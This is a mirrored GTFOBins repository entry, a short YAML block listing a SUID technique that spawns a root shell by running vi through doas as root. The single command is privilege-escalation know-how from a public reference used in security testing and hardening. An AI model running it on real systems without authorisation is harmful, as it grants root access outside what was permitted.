mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
8 lines
116 B
Markdown
8 lines
116 B
Markdown
---
|
|
functions:
|
|
suid:
|
|
- description: Spawn root shell with vi/vim.
|
|
code: |
|
|
./doas -u root vi
|
|
---
|